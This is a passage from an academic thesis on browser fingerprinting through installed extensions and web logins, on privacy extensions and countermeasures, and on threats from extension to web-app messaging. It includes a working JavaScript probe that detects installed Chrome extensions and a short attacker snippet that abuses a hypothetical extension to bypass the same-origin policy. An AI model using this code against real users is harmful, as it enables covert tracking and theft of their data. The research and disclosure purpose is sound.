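    remaining.delete(best);
    partition = partition.flatMap(set =>
      [set.filter(u => u[best]), set.filter(u => !u[best])].filter(s => s.length > 0));
  }
  return template;                          // ordered list of attributes to test
}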
(a) DExt – 5,474 users (b) DLog – 9,492 users (c) DExt∩DLog – 3,919 users (d) DExt∪DLog – 11,047 users
Figure 7.11 – Anonymity sets for different numbers of attributes tested by the general
fingerprinting algorithm.
Evaluation. To apply general fingerprinting, we first measure uniqueness using all
attributes, which gives our target level A. Then, we run the algorithm until either it
stops by itself (e.g., the fingerprint cannot be extended further), or we terminate it early
when the achieved level of uniqueness B is within 1% of level A.
Figure 7.11 shows the anonymity sets for different fingerprint lengths for our datasets
DExt, DLog, DExt∩DLog and DExt∪DLog, generated by the general fingerprinting algorithm.
For DExt and DLog, the algorithm provided fingerprint templates of 485 extensions
and 35 logins respectively. In these cases the algorithm stopped because no more attributes
could be used to achieve better uniqueness; hence the final anonymity sets are very close to
those in Figure 7.7. In the cases of DExt∩DLog and DExt∪DLog, we observed slow convergence
in uniqueness, so we could stop the algorithm early (shown as white dots in Figure
7.11). As a result, for DExt∩DLog, we obtain 86.19% of unique users by testing 270
extensions and logins. For DExt∪DLog, we obtain 48.31% of unique users by testing
419 extensions and logins.
We conclude that the general fingerprint can achieve a significant decrease in the fingerprint
length while maintaining the level of uniqueness almost at maximum. In the next section
we discuss the performance of these results.
For the DExt dataset, the general fingerprinting algorithm provides 485 extensions, but we found
that 20 of these extensions were not stable (see Figure 7.3) and were not present in the
last month of our experiment. Using all extensions, including unstable ones, can be useful
to maintain fingerprint comparability with older data or with users having older versions
of extensions. However, if we constrain general fingerprinting to stable extensions only, we
get a fingerprint template of 465 extensions, leading to 50.33% uniqueness – still very close
to the baseline uniqueness, which was 50.35% with stable extensions only.
6 Implementation and performance
In this section, we discuss the design choices we made for our experimental website and
analyze whether browser extension and Web login fingerprinting is efficient enough to be
used by tracking companies.
To collect extensions installed in the user’s browser, we first needed to collect the extensions’
signatures from the Chrome Web Store. We collected 12,497 extensions in August 2017,
using the code shared by Sjösten et al. [249]. To detect whether an extension was installed,
we tested only one WAR per extension (see more details on WARs in Section 2). Because
the extensions’ signatures amounted to 40 MB and could take a long time to load on the
client side, we reorganized and compressed them down to 600 KB. However, testing all 12,497
extensions at once took 11.3–12.5 seconds and froze the UI of the Chrome browser.
To avoid freezing, we split the extensions into batches of 200, and testing all
12,497 extensions then ran in approximately 30 seconds.
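For illustration, the following sketch probes web accessible resources in batches so that the page remains responsive; the extension identifier, resource path and batch size shown are placeholders rather than entries of our actual signature file, and the sketch assumes image WARs.

// Sketch: detect installed Chrome extensions by probing their Web Accessible
// Resources (WARs) in batches, so that the UI thread is not blocked.
var signatures = [
  { id: "gighmmpiobklfepjocnamgkkbiglidom", war: "icons/icon24.png" },  // placeholder entry
  // ... one { id, war } entry per extension to test
];

// Probe one extension by loading one of its (image) WARs.
function probe(sig) {
  return new Promise(function(resolve) {
    var img = new Image();
    img.onload = function() { resolve({ id: sig.id, installed: true }); };
    img.onerror = function() { resolve({ id: sig.id, installed: false }); };
    img.src = "chrome-extension://" + sig.id + "/" + sig.war;
  });
}

// Test extensions in batches, yielding to the event loop between batches.
async function detectInBatches(sigs, batchSize) {
  var detected = [];
  for (var i = 0; i < sigs.length; i += batchSize) {
    var results = await Promise.all(sigs.slice(i, i + batchSize).map(probe));
    results.forEach(function(r) { if (r.installed) detected.push(r.id); });
    await new Promise(function(r) { setTimeout(r, 0); });  // keep the UI responsive
  }
  return detected;
}

detectInBatches(signatures, 200).then(function(ids) { console.log("detected:", ids); });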
Since testing all the extensions takes too long, trackers may not be using this technique in
practice. Therefore, we measured how much time it takes to apply the optimized finger-
printing algorithms from Section 5. Targeted fingerprinting addresses each user separately,
hence the number of tested extensions differs a lot from user to user. General fingerprinting
instead provides a generic optimization for all users. Based on our results from Section 5,
an attacker can test 485 extensions and obtain the same uniqueness results as with testing
all 12,497 extensions. Such testing can be run in 625 milliseconds with a signature file
size below 25 KB, which makes real-life tracking feasible. For websites with limited traffic,
extension detection alone could be used for tracking; for websites with a higher traffic load,
it could contribute supplementary information to fingerprinting. With targeted
fingerprinting the attacker can do even better, as such short patterns can be
detected in less than 10 milliseconds.
Compared to extension detection, Web login detection methods depend on more external
factors (such as network speed and how fast websites respond), thus they should be used
with caution. For redirection URL hijacking detection, we observed that the majority of
Web logins can be detected in 0.9–2.0 seconds; the timing was much harder to
measure for the method based on CSP violation reports. We observed that if the network
was overloaded and requests were delayed, then the results of login detection were not
reliable; however, unreliable results can likely be discarded easily by checking the
timings of the results (e.g., large delays appearing only in a few cases).
Moreover, we found a bug in the CSP reporting implementation of the Chrome browser that
makes this kind of detection even more difficult. When the system had not been rebooted for
more than a couple of days (we observed that this threshold varies between one day and multiple
weeks), the browser stopped sending CSP reports. We reported the issue to Chrome developers, as
this bug not only makes CSP-based detection unreliable, but more importantly undermines CSP
reporting itself.
7 The dilemma of privacy extensions
Various extensions exist that block advertisement content, such as AdBlock [6], or block
content that tracks users, such as Disconnect [47]. Such extensions undoubtedly protect
users’ privacy, but if they are easily detectable on an arbitrary webpage, then they can
contribute to users’ fingerprint and can be used to track the user across websites. In
our experiment based on detecting extensions via WARs, we could detect four privacy
extensions: AdBlock [6], Disconnect [47], Ghostery [61] and Privacy Badger [117]. The
goal of this section is to analyze the tradeoff between the privacy loss (how fingerprintable
users with such extensions are) and the level of protection provided by these extensions.
Figure 7.12 – Uniqueness of users vs. number of unblocked third-party cookies
To understand this tradeoff, we computed (i) how unique are the users who install privacy
extensions; (ii) how many third-party cookies are stored in the user’s browser when a
privacy extension is activated (the smaller the number of third-party cookies, the better
the privacy protection). We analyzed four privacy extensions detectable by WARs and 16
combinations of these extensions: AdBlock [6], Disconnect [47], Ghostery [61] and Privacy
Badger [117].
First, we measured how a combination of privacy extensions contributes to fingerprinting.
To measure the uniqueness of users for a given combination of extensions (e.g., AdBlock + Ghostery),
we removed the other privacy extensions from the DExt dataset (here, Disconnect and Privacy
Badger), and then evaluated the percentage of unique users for each combination.
Second, we measured how many third-party cookies were set in the browser, even if privacy
extensions were enabled. We performed an experiment where, for each combination of
extensions, we crawled the top 1,000 Alexa domains, visiting the homepage and 4 additional
pages in each domain. We kept the browsing profile while visiting pages of the same
domain, and used a fresh profile when we visited a new domain. We explicitly activated
Ghostery, which is deactivated by default, and trained Privacy Badger on the homepages of the
1,000 domains before performing our experiment. We collected all the third-party cookies
that remained in the user’s browser for each setting and divided their number by the number
of domains crawled.
Figure 7.12 reports on the average number of cookies that remained in the browser for each
combination of extensions, and the corresponding percentage of unique users.
7. The total number of users does not change since we simply remove certain extensions from the user’s
record in our dataset.
8. We extracted the first 4 links on the page that refer to the same domain.
Similarly to the results of Merzdovnik et al. [226], Ghostery blocks most of the third-party
cookies, and the least blocking extension is AdBlock. Surprisingly, some combinations such
as Disconnect + Ghostery resulted in more third-party cookies being set than for Ghostery
alone – even after double-checking the settings and re-running the measurements, we do
not have an explanation for this phenomenon. However, as this can have a serious counter-
intuitive effect on user privacy, it would be important to investigate it in future work.
More privacy extensions indeed increase a user’s uniqueness. All of these privacy extensions are
also part of the general fingerprint we calculated in Section 5.4. However, this has little
importance in practice. If we ban the general fingerprinting algorithm from using privacy
extensions, it generates a fingerprint template of 531 (instead of 485) extensions, leading
to a uniqueness level of 51.27%. While 46 additional extensions is a significant increase in the
number of extensions tested for fingerprinting, as we have already seen, this contributes very
little to the overall timing of the attack.
On the other hand, as this experiment revealed, these extensions are also very useful to
block trackers. We could therefore conclude that using Ghostery is a good trade-off between
blocking trackers and avoiding extension-based tracking. However, in order to efficiently
solve the trade-off dilemma, we believe that such functionality should be included by default
in all browsers.
8 Countermeasures
We provide recommendations for users who want to be protected from extensions- and
logins-based fingerprinting. We also provide developers with recommendations to improve
browser and extension architectures in order to reduce the privacy risks for their users.
Countermeasures for extension detection. The extension detection method based on
Web Accessible Resources detects 28% of Google Chrome extensions, while for Firefox the
number is much smaller: only 6.73% of extensions are detectable by WARs [249]. Firefox gives
a good example of a browser architecture that makes extension detection difficult. The
upcoming Firefox extensions API, WebExtensions, which is compatible with the Chrome ex-
tensions API [25], is designed to prevent extension fingerprinting based on WARs: each
extension is assigned a new random identifier for each user who installs the extension [152].
To protect users, developers of Chrome extensions could avoid Web Accessible Resources
by hosting them on an external server; however, this could lead to other privacy
and security problems [249]. Developers of the Chrome browser could nonetheless improve
the privacy of their users by adopting random per-user identifiers for extensions, as in the
WebExtensions API.
Most browsers are vulnerable to extension detection, and websites can also detect
extensions by their behavior [260]. Therefore, users cannot protect themselves
completely today, but they can still minimize the risk by using browsers such as Firefox,
where a smaller fraction of extensions is detectable.
Countermeasures for login detection. Users may opt for tracker-blocking and adblocking
extensions, such as Ghostery [61], Disconnect [47] or AdBlockPlus [7]. But these extensions block
requests to well-known trackers, while Web login detection sends requests to completely
legitimate websites, to which the user has logged in anyway. Another option is to install
extensions that block cookies arriving from unknown or undesirable domains. These
extensions do not protect users, for the same reason: the cookies that belong to websites the
user visits (where they are treated as first-party cookies) are the very cookies used for login
detection (the only difference being that, during detection, they are sent in a third-party
context). For example, social websites such as Facebook or Twitter use first-party cookies,
and their social button widgets carrying these cookies as third-party cookies may still be
allowed by the browser extensions in the context of other websites. Therefore, users can
protect themselves from Web login detection only by disabling third-party cookies in their
browsers.
Website owners could also react to such a potential privacy risk for their users. In our
case, this would simply mean filtering login URL redirections, and sanity-checking other
redirection mechanisms against the CSP-based attack. Unfortunately, this issue has been
known for a while, but website owners do not patch it because they do not consider it
a serious privacy risk [223].
Browser vendors could help avoid login detection by blocking third-party cookies by default.
The new Intelligent Tracking Prevention of the Safari browser takes a step in the right
direction, as it blocks access to third-party cookies and deletes them after a while.
9 Discussion and future work
Realistic datasets. To compare our study with previous works on fingerprinting via
browser extensions, we analyzed different random subsets of the 7,643 users who run the Chrome
web browser (the browser where extension detection is possible in our experiment). Figure 7.13
shows how user uniqueness based on extensions changes for the various subsets
of our dataset. It clearly demonstrates the intuition that the smaller the user set, the
smaller the diversity of users, and the easier it is to uniquely identify them.
Figure 7.13 – Uniqueness of Chrome users based on their extensions only vs. number of
users - 204 is the number of users used in [245] and 854 the number of users considered
in [260]
Figure 7.13 compares our results to previous studies on browser extension fingerprinting:
we have 7,643 Chrome users, while previous studies had 204 [245] and 854 [260] users, and
therefore drew different conclusions about the uniqueness of users based on browser extensions.
We reported on the number of unique users in subsets of 204 and 854 users in Section 3.2
(see Table 7.2). By exploring this comparison, we raise a fundamental question: What is
the “right” size for the dataset?
Taking a look at research on standard fingerprinting, in 2010 Eckersley showed that 95% of
browsers were unique based on their properties [185], a result backed by several papers
since then [173,221]. However, a recent study of 2 million fingerprints collected in 2018
found only 33.6% of those fingerprints to be unique [191].
It is extremely difficult for computer scientists to get access to such large datasets. In our
experience, we advertised our experiment website through all possible channels, including
Twitter, Reddit, and press coverage, and found that obtaining larger, high-quality
datasets is a highly nontrivial research task. It is important to re-evaluate our results over
time while also aiming to obtain larger datasets.
Stability of fingerprints. While studying uniqueness based on various behavioral features,
it is very important to know how stable these features are: the ability to use a piece of
information as part of a fingerprint does not solely depend on its anonymity set or
overall entropy, but also on its stability (i.e., how frequently it changes over
time). Vastel et al. [266] recently analyzed the evolution of the fingerprints of 1,905 browsers
over two years. They concluded that fingerprint evolution strongly depends on the type
of device (laptop vs. mobile) and how it is used. Overall, they observed that 50% of
browsers changed their fingerprints in less than 5 days.
In our study we did not have enough data to make any claims about the stability of
browser extensions and web logins because only a few users repeated the experiment on our
website (to be precise, only 66 users out of 16,393 made more than 4 tests
on our website). We would expect browser extensions to be more stable than logins,
since users do not seem to change extensions very often, while they may log in and log
out of various websites during the day. However, studying the stability of extensions and
logins would require all our users to install a tool (probably a browser extension) in their
browsers that would monitor the extensions they install and the logins they perform. This kind
of experiment would be even harder to perform at large scale, since users do not easily agree
to install new browser extensions. In the AmIUnique experiment, Laperdrix [218] tried
to measure the stability of browser fingerprints: he collected data from 3,528 devices over a
twenty-month-long experiment. We managed to have 16,393 users test our website in 9
months. This suggests that users are more willing to test their browser on a website than to
install new extensions.
We therefore leave the study of fingerprint stability for future work and raise an important
question for the privacy measurement community: How can we ensure large-scale
coverage of users for our privacy measurement experiments?
10 Conclusion
This chapter reports on a large-scale study of a new browser fingerprinting technique
based on browser extensions and website logins. The results show that 18.38% of users
are unique because of the extensions they install (54.86% of users that have installed at
least one detectable extension are unique); 11.30% of users are unique because of the
websites they are logged into (19.53% are unique among those who have logged into one or
more detectable websites); and 34.51% of users are unique when combining their detected
extensions and logins (89.23% are unique among users with at least one extension and one
login). It also shows that the fingerprinting techniques can be optimized and performed in
625 ms.
This work illustrates, once more, that user anonymity is very challenging on the Web.
Users are unique in many different ways, in real life and on the Web. For example, it
has been shown that users are unique in the way they browse the Web, the way they move
their mouse, or by the applications they install on their device [201]. This work shows that
users are also unique in the way they configure and augment their browser, and by the
sites they connect to. Unfortunately, although uniqueness is valuable in society because
it increases diversity, it can be misused by malicious websites to fingerprint users and can
therefore hurt privacy.
Another important contribution of this work is the definition and the study of the trade-off
that exists when a user decides to install a “privacy” extension, for example, an extension
that blocks trackers. This work shows that some of these extensions increase users’ uniqueness
and can therefore contribute to fingerprinting, which is counter-productive. We argue that
these “privacy” extensions are very useful, but that their functionality should be included by
default in all browsers. “Privacy by default”, as advocated by the new EU privacy regulation,
should be enforced to improve the privacy of all Web users.
Part III
Browser Extensions
Introduction
The concept of browser extensions or addons, regardless of the underlying architecture
or browser, always exhibits very common characteristics: extensions are third-party code that
executes in browsers with elevated privileges, giving them access to features and user data
that traditional web applications, for instance, cannot directly access. In the past, different
browsers have supported different systems for extensions development. Egele et al. [186]
applied a dynamic analysis system to detect spyware in the Internet Explorer Browser
Helper Objects (BHOs). Prior work has also shown the dangers of misusing the powerful APIs
provided to Firefox XPCOM extensions and proposed tools for discovering vulnerabilities
and securing extensions [170,224,232,233]. Barth et al. [172] analyzed the Firefox XPCOM
architecture and proposed a new extensions architecture that has since been adopted by
Google Chrome and evolved into the Chrome Extensions API compatible with the cross-
browser WebExtensions API. Among other things, the permissions system in extensions
was meant to reduce extensions capabilities, and hence reduce the harms that attackers
can cause if they compromise an extension. However, a number of studies have shown
that many extensions still request too many permissions [195,202,213].
The WebExtensions API [100] has been introduced by Firefox as a cross-browser platform
for developing extensions that run on many browsers. To a large extent, it is compati-
ble with the Chrome extension API [25], Opera Extension API [110] and Microsoft Edge
Extension API [2]. Carlini et al. [181] reviewed 100 Chrome extensions and found many
vulnerabilities due to the injection of insecure scripts (loaded over insecure HTTP chan-
nels), inline scripts, and the use of eval-like functions that turn strings into code.
Their proposal to ban these insecure practices is now part of the browser extension
APIs [2,25,100,110].
Guha et al. [195] proposed IBEX, a platform for writing cross-browser extensions in high-
level type-safe languages such as .NET languages and a secure subset of JavaScript. Finding the
permission system of the Chrome extension API too coarse-grained, they proposed specifying
more fine-grained access control and data flow policies for extensions, and provided
tools for verifying the compliance of an extension with its security policies.
Kapravelos et al. [213] introduced Hulk, a dynamic analysis system for discovering malicious
extensions that monitors the execution and network traffic of extensions. To
trigger extension behavior, Hulk presents honeypages and is able to generate on the fly the
elements that extensions require access to. It then uses a fuzzer to trigger network
event listeners in the extension, to which it presents mock network objects. Applying
Hulk to Chrome extensions allowed the authors to discover malicious extensions performing user
credential theft, social network abuse, etc.
Following the idea of honey pages, Weissbacher et al. [270] introduced Ex-Ray for discov-
ering history-leaking Chrome extensions.
Starov and Nikiforakis [259] also performed a dynamic analysis of Chrome extensions and
found many extensions leaking sensitive user information such as browsing history, search
queries, form data and extensions list to third parties.
Calzavara et al. [176] modeled the Chrome browser extension system and formalized the
privileges that an opponent can escalate through the message passing API between web
applications and extension content scripts. They then proposed a prototype implementa-
tion of their system, named CHEN, which can be used by extension developers to evaluate
the robustness of an extension against privilege escalation and help them refactor their
extensions.
Communications with web applications
In Chapter 8, we present the first large-scale study of the security and privacy implications
of the communications between browser extensions and web applications, which allow the latter
to benefit from extensions’ privileged capabilities. We built a static analyzer for extensions
and identified a good number of them that can be exploited by web applications to benefit
from their privileged capabilities and thereby access sensitive user information: bypass the
SOP and read user data on any web application, access user cookies, browsing history,
bookmarks, and the list of installed extensions, store and retrieve data from the extension
storage for tracking purposes, or even trigger the download of malicious files onto the user’s
device.
Our work has some similarities with the work of Calzavara et al. [176], since we are also
interested in the message passing interfaces. Technically, however, we believe that our tool
is more engineered than their prototype implementation, and the goal of their study was
not to systematically study the security and privacy implications of the message passing
interfaces at large scale. For instance, they did not model many of Chrome’s sensitive APIs,
and the related threats, as we have done in this work. The way message handlers are
extracted and analyzed is also very different. While they considered only the first function
registered as a listener, our tool is able to track sensitive API calls in the first handler and
all of its dependencies (the functions that it further invokes). Moreover, their tool does not
consider the complexities of JavaScript function invocations and object property accesses,
which influences its precision in detecting API calls and listener registrations.
Content scripts in the Chrome extension API [25] at the time of their study were not privi-
leged. In other words, they always needed to forward messages to the background pages in
order to get access to the privileged APIs. Content scripts in WebExtensions however are
privileged: they are not subject to the Same Origin Policy, and have access to the extension
storage. Calzavara et al. also did not consider direct communications between extension background
pages and webpages, while we found this practice widespread among extensions. The long-
term communications (ports) between content scripts and background pages were also not
considered. Finally, while they did not perform any large-scale analysis with their system, we
analyzed Chrome, Firefox and Opera extensions and discovered many extensions posing different
security and privacy threats.
CORS headers manipulations
In Chapter 9, we study the implications of CORS headers manipulations by browser ex-
tensions. We first developed CORSER, a cross-browser extension that tampers with CORS
headers so as to allow otherwise unauthorized cross-origin requests. While developing such
an extension requires little effort, it does require a good understanding of the CORS
mechanism. Worryingly, we found that such an extension is considered benign from a
browser vendor’s perspective: it successfully passed the extension review processes of
Chrome, Firefox and Opera, where we published it. Furthermore, we performed an em-
pirical study of extension permissions and found that around 10% of Chrome, Firefox
and Opera extensions have the capability to disable the SOP in browsers by tampering
with CORS headers. We further statically analyzed extension source code and found
that a few extensions effectively tamper with CORS headers to allow cross-origin requests.
More surprisingly, we found that many extension developers misunderstand the CORS
mechanism, as they manipulate HTTP headers in a way that makes legitimate CORS re-
quests fail, thereby breaking web applications running in the user’s browser. Finally, we discuss
countermeasures and different proposals to improve the security and privacy of users,
and the security of web browsers and applications.
To the best of our knowledge, only two works have studied the manipulation of security
headers by browser extensions. By analyzing the network traffic generated by Chrome ex-
tensions, Kapravelos et al. [213] flagged 24 of them as malicious because they were tamper-
ing with Content-Security-Policy and X-Frame-Options security headers. Hausknecht
et al. [200] found many extensions tampering with the Content-Security-Policy and
proposed an endorsement mechanism, which can be implemented by browsers and web
servers, to authorize or reject CSP header modifications. Tampering with these two headers
leaves a web application unprotected against the attacks they mitigate, namely Cross-Site
Scripting [41] and clickjacking [244] attacks.
Our work is the very first that addresses the ability of extensions to directly disable the
Same Origin Policy in browsers by appropriately tampering with CORS headers. Contrary
to other security headers, whose removal introduces security threats only in specific
web pages and further requires that the page has a vulnerability an attacker can ex-
ploit, tampering with CORS headers removes the Same Origin Policy protection
in browsers, immediately giving attackers unrestricted access to all user data in any web ap-
plication. As we have also shown, careless tampering with CORS headers can even break
the normal functionality of web applications, preventing a user from using her favorite
applications in the browser.
Chapter 8
Implications of the communications between
browser extensions and web applications
Preamble
This chapter reports the results of an analysis of the communications between browser
extensions and web applications. We found many extensions that can be exploited by web
applications to access sensitive user information.
This chapter is under submission.
1 Introduction
In this work, we focus on the WebExtensions API, the cross-browser extension system
compatible with major browsers including Chrome, Firefox, Opera and Microsoft
Edge [2,25,100,110]. Extensions can make HTTP requests to get data from any web appli-
cation server, including those where users are logged in, such as their email, banking, or
social network applications. By comparison, web applications are bound by the Same
Origin Policy (SOP) [125] and cannot access other web applications’ data, unless both
implement mechanisms such as Cross-Origin Resource Sharing (CORS) [40]. Web applica-
tions can store information in the user’s browser (cookies, HTML5 localStorage, cache, etc.).
However, since such storage mechanisms can be abused for tracking purposes [225,242],
modern browsers provide users with the ability to prevent, control or remove the information
that web applications can store. Extensions, on the contrary, have access to a persistent
storage in which they can store and retrieve data for as long as they are installed in the
browser. Even when users clear their browsing data, extension storage is not affected.
Other privileged APIs available to browser extensions include APIs to read and write the user’s
browsing history, bookmarks and cookies, manage the list of extensions the user has installed,
or even trigger the download of arbitrary files and save them on the user’s device.
For security reasons, extensions and web applications execute in different, isolated con-
texts. Extensions can inject content directly into the execution context of web applications,
but the converse is not possible. Nonetheless, there are many mechanisms that extensions
and web applications can use to exchange data. First of all, extensions have access
to web applications’ DOM and localStorage, which they can read and write while executing
in their separate contexts. These modifications are visible to both sides (extension and
web application), and can thus serve as a means of sharing data. Moreover, extensions and
web applications can set up communication channels to exchange data with one another
using the postMessage API [39], for instance.
In this work, we focus on the communication channels that extensions can establish with
web applications to exchange data. The messages that extensions expect from web appli-
cations, and more importantly how they handle them, are entirely up to the developers of
the extensions. For instance, an extension can allow an application to send it the URL
of a resource (data) hosted by another web application. It then makes a request to fetch
the data (since it can do so with any web application as it is not subject to the SOP) and
returns the response to the web application that previously sent the message. Another
extension may allow a web application to send information that it will store in its persis-
tent storage. Later on, the same application can send a message to the extension, which
retrieves the previously stored data and returns it back to the application. In yet another
scenario, upon receiving a message from an application, an extension can retrieve
the list of extensions the user has installed, or their browsing history, bookmarks, cookies
and send them back to the application. Hence, these communications channels are a way
for an extension to indirectly give a web application access to browser features and APIs
that the web application is not directly allowed to access.
We built a static analyzer and applied it to the message passing interfaces exposed by
Google Chrome, Firefox and Opera extensions to web applications. When the tool found
that a privileged extension capability could potentially be exploited by web applications,
the extension was flagged as suspicious. By manually reviewing the code of suspicious exten-
sions, we found that 197 of them (mostly on Chrome) can be exploited by web applications
(attackers) to access elevated browser features and APIs and sensitive user information.
Our results let us analyze the security and privacy implications of the communications
between extensions and web applications. Extensions can be exploited by web applica-
tions to bypass the Same Origin Policy and access user data on any application including
those applications where the user is logged into. Persisting data in the extension storage
can be exploited by a web application to uniquely identify the user and track her even
though she used privacy features provided by modern browsers such as blocking cookies,
cleaning applications storages, etc. By reading the user’s credentials (cookies), an attacker
can perform session hijacking attacks [129], access user data and take arbitrary actions on
her behalf. In addition, accessing the user’s browsing history or bookmarks violates her
privacy, and represents valuable information, which in the hands of an attacker, can be
used to serve targeted advertisement, or even uniquely identify the user for tracking pur-
poses. Discovering the list of extensions a user has installed reveals information about the
user’s interests and can serve to fingerprint her browser [198,245,249,260]. Finally, being
able to trigger downloads can be exploited by an attacker to add malicious software to the
user’s device. Inadvertently executing such software could let an attacker take control of
the user’s device and perform malicious actions (exfiltrating or damaging her data).
In summary, this work shows the security and privacy threats associated with the interac-
tions between browser extensions and web applications and makes the following contribu-
tions:
— We built a static analysis tool and analyzed extensions message passing interfaces
at large-scale: 66,401, 9,391 and 2,523 extensions on Chrome, Firefox and Opera re-
spectively. About 4.97%, 5.14% and 8.48% of Chrome, Firefox and Opera extensions
respectively were flagged as suspicious.
— We identified 197 extensions that pose various security and privacy threats to browsers,
web applications, and users. They can be exploited by web applications to bypass
the SOP, read user cookies, browsing history, bookmarks, list of installed extensions,
store and retrieve data from the extension storage, or download malicious files and
store them on the user device.
Our findings raise many questions about the security and privacy design of extensions.
Despite the threats of the aforementioned interactions between extensions and web appli-
cations, we found no browser vendor that warns users about the possible threats posed
by the extensions they install. We argue that browser vendors need to review extensions
more rigorously, in particular take into consideration the security and privacy threats that
we have identified. The static analysis tool we have developed could be applied to any
extension on major browsers in order to identify and fix the threats described in this work,
before the extension is made public for users to install and use.
2 Context
Figure 8.1 – Browser extensions architecture - Communications with web applications
Extensions can be divided into three main parts, as shown in Figure 8.1. The background
page is the main part of the extension. It has full access to all the capabilities of the
extension. Users interact with the extension through UI pages (i.e., UI elements, options
and settings pages), in order to enable or disable it, or customize its behavior. UI pages
also have access to the full capabilities of the extension. Content scripts are injected by
extensions to run alongside web applications. Even though they are not granted access to all
the extension capabilities, they can directly use the host and storage permissions to access
user data on any web application or to store and retrieve data from the extension storage.
Content scripts can also manipulate the DOM of webpages [48] and inject content into them.
On Chrome and Opera, each extension is assigned a permanent unique identifier, which is
the same for all users of the extension. Firefox, however, generates a random identifier for
each extension, per user browser [52].
2.1 Interactions
Background and UI pages have direct access to each other’s execution contexts [19], but
content scripts execute in a separate context. Web applications run in yet other separate
execution contexts. Nonetheless, content scripts have direct access to web applications’
localStorage, DOM, and execution context, where they can inject and execute arbitrary
scripts.
Even though content scripts, background pages and web applications run in separate ex-
ecution contexts, they can establish communication channels to exchange messages with
one another [93,107] as shown in Figure 8.1. We describe below the APIs for sending and
receiving (listening for) messages between the content scripts, background pages and web
applications.
Content scripts and background pages. There are two types of communication chan-
nels: one-time and long-lived channels. One-time channels are opened to send a message
and are closed after the response is received. Long-lived channels, connections or ports,
are maintained open to exchange multiple messages. A port can have a name in order to
distinguish it from other long-lived channels.
For one-time messages, content scripts use the runtime.sendMessage API to send messages
to background pages. Similarly, background pages employ the tabs.sendMessage API to
send messages to content scripts. For receiving messages, both components can invoke the
runtime.onMessage.addListener API.
Similarly, runtime.onConnect.addListener and runtime.connect are used to establish
long-term communications between background pages and content scripts.
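For illustration, a minimal one-time exchange and a long-lived port between a content script and a background page could look as follows; the message fields are arbitrary examples, not taken from a real extension.

// Content script: send a one-time message to the background page
chrome.runtime.sendMessage({ type: "getData", key: "example" }, function(response) {
  console.log("background answered:", response);
});
// Background page: receive the one-time message and reply
chrome.runtime.onMessage.addListener(function(message, sender, sendResponse) {
  if (message.type === "getData") {
    sendResponse({ value: "some data for " + message.key });
  }
});

// Long-lived channel: the content script opens a named port...
var port = chrome.runtime.connect({ name: "my-channel" });
port.postMessage({ hello: "background" });
// ...and the background page accepts the connection and echoes messages back
chrome.runtime.onConnect.addListener(function(p) {
  p.onMessage.addListener(function(msg) { p.postMessage({ echo: msg }); });
});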
Web applications and content scripts. Exchanges between web applications and con-
tent scripts are achieved with the Cross-Origin Communications API [39]: postMessage is
used for sending messages, and onmessage or addEventListener to receive messages. Be-
low is a listing which shows how messages are sent and received between web applications
and content scripts.
// Web application: send a message and receive the response
postMessage("Hello Extension", "*");
addEventListener("message", function(event){
  Received_response = event.data;
});
// Content script: receive the message and reply
// (a real implementation should check event.source and filter message types)
addEventListener("message", function(event){
  Received_message = event.data;
  postMessage("Hello Web Application", "*");
});
In this example, the web application sends the message Hello Extension to the content
script, which receives and writes it in the variable Received_message. Then it replies with
Hello Web application, which the web application receives and saves in the variable
Received_response.
Web applications and background pages. On Chrome and Opera, web applications
can also directly communicate with extensions’ background pages. To do so, extensions
have to declare, in their manifest.json file and using the externally_connectable key, the
list of web applications that are allowed to communicate with the background page. For
security reasons, one cannot use a wildcard (for instance, *) to allow communications between
the background page and all web applications. Additionally, communications can only be
initiated by web applications.
The runtime.sendMessage and runtime.connect APIs are exposed to web applications in
Chrome and Opera, and can be used to send one-time messages or establish long-term con-
nections with background pages. The APIs runtime.onMessageExternal.addListener
and runtime.onConnectExternal.addListener are used in the background page, to re-
ceive and reply to messages sent by web applications. Below is an example of how to send
a message from a web application to the background page of an extension whose unique
identifier is ExtensionID.
// Web application: send a message and receive the response
chrome.runtime.sendMessage(ExtensionID, "Hello Extension",
  function(response){
    Received_response = response;
});
// Background page: receive the message and reply
chrome.runtime.onMessageExternal.addListener(function(message,
  sender, sendResponse){
    Received_message = message;
    sendResponse("Hello Web application");
});
The application sends Hello Extension to the background page which replies with Hello
Web application.
2.2 Threat models
An attacker is a script present in a web application currently running in the user’s
browser. The script either belongs to the web application or to a third party. The goal
of the attacker is to interact with installed extensions in order to access sensitive user
information. He relies on extensions whose privileged capabilities can be exploited via
an exchange of messages with scripts in the web application. We consider the following
security and privacy threats posed by extensions.
1. Execute code: these are extensions that can be exploited by the attacker to execute
arbitrary code in the extension context. Executing code in the background page
gives the attacker access to all the capabilities of the extension. In content scripts,
the attacker can bypass the SOP by making cross-origin AJAX requests, and use the
extension’s persistent storage for tracking purposes.
2. Bypass SOP: in this case, an attacker can exploit the capability of the extension to
make cross-origin requests without being restricted by the Same Origin Policy.
3. Read cookies: the attacker can read the user’s cookies and use them to mount session
hijacking attacks, access user data and take actions on her behalf.
4. Trigger downloads: the attacker exploits extensions to trigger the download of
arbitrary malicious files (software) and save them on the user’s device without re-
quiring any action from the user. If the user inadvertently runs such software, the
attacker takes control of her device and performs malicious actions.
5. Read browsing history, bookmarks and list of installed extensions: this
information reveals the user’s interests and habits and can be used by the attacker for
tracking purposes, or to serve targeted and personalized advertisements.
6. Store data: the attacker can store and retrieve information in the extension storage.
This can be used for tracking purposes, even when users clear web application
storage.
For the sake of simplicity, we often refer to the attacker as the web application in which it
runs. A set of videos demonstrating how we exploited these threats on some Chrome extensions
can be viewed at https://swexts.000webhostapp.com/extensions/.
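To make the threat model concrete, the snippet below shows the kind of message an attacker script could send to a hypothetical vulnerable extension whose content script fetches arbitrary URLs on behalf of the page; the message format is invented for illustration, as every extension expects its own message signature.

// Attacker script running in a web page. It asks a hypothetical vulnerable
// content script to fetch a cross-origin URL with the extension's privileges,
// thereby bypassing the SOP. The message format is illustrative only.
window.addEventListener("message", function(event) {
  if (event.data && event.data.type === "fetch-response") {
    console.log("cross-origin data:", event.data.body);  // e.g. the victim's webmail page
  }
});
window.postMessage({ type: "fetch", url: "https://mail.example.com/inbox" }, "*");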
3 Methodology
We built a static analyzer that detects suspicious communications enabled by extensions
with web applications. To identify extensions that are potentially affected by the
security and privacy threats identified in the previous section, we applied it to 78,315 extensions
from the Chrome, Firefox and Opera browsers. Then we manually reviewed the code of the flagged
extensions to precisely validate the results of the static analyzer and, more importantly,
to construct the signatures of the messages that have to be exchanged with the extensions to
successfully exploit their capabilities. Figure 8.2 shows the analysis process.
Figure 8.2 – Methodology - static and manual analysis
3.1 Static analysis
